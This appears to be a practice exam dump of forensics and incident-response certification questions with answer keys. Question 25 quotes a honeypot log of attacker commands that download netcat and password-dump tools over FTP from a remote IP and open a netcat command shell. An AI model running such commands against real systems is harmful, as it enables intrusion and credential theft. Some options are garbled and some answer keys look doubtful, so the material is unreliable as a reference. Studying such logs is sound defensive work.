NEW QUESTION 1

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

• A. Only FTP traffic can be hijacked
• B. Only an HTTPS session can be hijacked
• C. HTTP protocol does not maintain session
• D. Only DNS traffic can be hijacked

Answer: C

NEW QUESTION 2

Which response organization tracks hoaxes as well as viruses?

• A. NIPC
• B. FEDCIRC
• C. CERT
• D. CIAC

Answer: D

Explanation:
Note: CIAC (Computer Incident Advisory Capability) Was run by the US Department of energy

NEW QUESTION 3

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

• A. Security Administrator
• B. Network Administrator
• C. Director of Information Technology
• D. Director of Administration

Answer: B

NEW QUESTION 4

When is it appropriate to use computer forensics?

• A. If copyright and intellectual property theft/misuse has occurred
• B. If employees do not care for their boss?management techniques
• C. If sales drop off for no apparent reason for an extended period of time
• D. If a financial institution is burglarized by robbers

Answer: A

NEW QUESTION 5

Which of the following commands shows you the NetBIOS name table each?

• A. nbtstat -n
• B. nbtstat -c
• C. nbtstat -r
• D. nbtstat -s

Answer: A

NEW QUESTION 6

In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves?

• A. The change in the routing fabric to bypass the affected router
• B. More RESET packets to the affected router to get it to power back up
• C. STOP packets to all other routers warning of where the attack originated
• D. RESTART packets to the affected router to get it to power back up

Answer: A

NEW QUESTION 7

Windows Security Event Log contains records of login/logout activity or other security-related events specified by the system's audit policy. What does event ID 531 in Windows Security Event Log indicates?

• A. A user successfully logged on to a computer
• B. The logon attempt was made with an unknown user name or a known user name with a bad password
• C. An attempt was made to log on with the user account outside of the allowed time
• D. A logon attempt was made using a disabled account

Answer: D

NEW QUESTION 8

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not?

• A. CVE
• B. IANA
• C. RIPE
• D. APIPA

Answer: A

NEW QUESTION 9

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software ?

• A. Computer Forensics Tools and Validation Committee (CFTVC)
• B. Association of Computer Forensics Software Manufactures (ACFSM)
• C. National Institute of Standards and Technology (NIST)
• D. Society for Valid Forensics Tools and Testing (SVFTT)

Answer: C

NEW QUESTION 10

Why should you never power on a computer that you need to acquire digital evidence from?

• A. When the computer boots up, files are written to the computer rendering the data nclean?When the computer boots up, files are written to the computer rendering the data ?nclean
• B. When the computer boots up, the system cache is cleared which could destroy evidence
• C. When the computer boots up, data in the memory buffer is cleared which could destroy evidenceWhen the computer boots up, data in the memory? buffer is cleared which could destroy evidence
• D. Powering on a computer has no affect when needing to acquire digital evidence from it

Answer: A

NEW QUESTION 11

When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?

• A. Write-blocker
• B. Protocol analyzer
• C. Firewall
• D. Disk editor

Answer: A

NEW QUESTION 12

Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is:

• A. HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentversion ProfileList
• B. HKEY_LOCAL_MACHlNESOFTWAREMicrosoftWindows NTCurrentVersion NetworkList
• C. HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentsVersion setup
• D. HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSchedule

Answer: A

NEW QUESTION 13

Corporate investigations are typically easier than public investigations because:

• A. the users have standard corporate equipment and software
• B. the investigator does not have to get a warrant
• C. the investigator has to get a warrant
• D. the users can load whatever they want on their machines

Answer: B

NEW QUESTION 14

From the following spam mail header, identify the host IP that sent this spam? From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id
fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0
X-Priority: 3 X-MSMail- Priority: Normal
Reply-To: "china hotel web"

• A. 137.189.96.52
• B. 8.12.1.0
• C. 203.218.39.20
• D. 203.218.39.50

Answer: C

NEW QUESTION 15

What is the first step that needs to be carried out to investigate wireless attacks?

• A. Obtain a search warrant
• B. Identify wireless devices at crime scene
• C. Document the scene and maintain a chain of custody
• D. Detect the wireless connections

Answer: A

NEW QUESTION 16

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?

• A. The registry
• B. The swapfile
• C. The recycle bin
• D. The metadata

Answer: B

NEW QUESTION 17

Which one of the following is not a consideration in a forensic readiness planning checklist?

• A. Define the business states that need digital evidence
• B. Identify the potential evidence available
• C. Decide the procedure for securely collecting the evidence that meets the requirement fn a forensically sound manner
• D. Take permission from all employees of the organization

Answer: D

NEW QUESTION 18

This is the original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.

• A. Master Boot Record (MBR)
• B. Master File Table (MFT)
• C. File Allocation Table (FAT)
• D. Disk Operating System (DOS)

Answer: C

Explanation:
A MBR is usually found on fixed disks, not floppy. A MFT is part of NTFS, and NTFS is not used on floppy DOS is an operating system, not a file structure database

NEW QUESTION 19

File deletion is a way of removing a file from a computer's file system. What happens when a file is deleted in windows7?

• A. The last letter of a file name is replaced by a hex byte code E5h
• B. The operating system marks the file's name in the MFT with a special character that indicates that the file has been deleted
• C. Corresponding clusters in FAT are marked as used
• D. The computer looks at the clusters occupied by that file and does not avails space to store a new file

Answer: B

NEW QUESTION 20

What term is used to describe a cryptographic technique for embedding information into something else for the sole
purpose of hiding that information from the casual observer?

• A. Key escrow
• B. Steganography
• C. Rootkit
• D. Offset

Answer: B

NEW QUESTION 21

What is the smallest allocation unit of a hard disk?

• A. Cluster
• B. Spinning tracks
• C. Disk platters
• D. Slack space

Answer: A

NEW QUESTION 22

Jones had been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment?

• A. A system using Trojaned commands
• B. A honeypot that traps hackers
• C. An environment set up after the user logs in
• D. An environment set up before an user logs in

Answer: B

NEW QUESTION 23

What file structure database would you expect to find on floppy disks?

• A. NTFS
• B. FAT32
• C. FAT16
• D. FAT12

Answer: D

Explanation:
NTFS is not designed for removable media, although used on some removable media that is very large, never for floppy disks.
FAT32 has a minimum space requirement which is larger than floppy disks FAT16 would seem like a logical choice, but is not usually used on floppies FAT12 would be on floppy disks, and probably not seen on anything else. Since floppy disk media is small in size (less than 2 MB), a FAT12 file system has lower overhead and is more efficient.

NEW QUESTION 24

Which of the following statement is not correct when dealing with a powered-on computer at the crime scene?

• A. If a computer is switched on and the screen is viewable, record the programs running on screen and photograph the screen
• B. If a computer is on and the monitor shows some picture or screen saver, move the mouse slowly without depressing any mouse button and take a photograph of the screen and record the information displayed
• C. If a monitor is powered on and the display is blank, move the mouse slowly without depressing any mouse button and take a photograph
• D. If the computer is switched of
• E. power on the computer to take screenshot of the desktop

Answer: D

NEW QUESTION 25

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00
>>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?

• A. It is a local exploit where the attacker logs in using username johna2k
• B. There are two attackers on the system – johna2k and haxedj00
• C. The attack is a remote exploit and the hacker downloads three files
• D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C

Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

NEW QUESTION 26

Which of the following statements does not support the case assessment?

• A. Review the case investigator's request for service
• B. Identify the legal authority for the forensic examination request
• C. Do not document the chain of custody
• D. Discuss whether other forensic processes need to be performed on the evidence

Answer: C

NEW QUESTION 27
......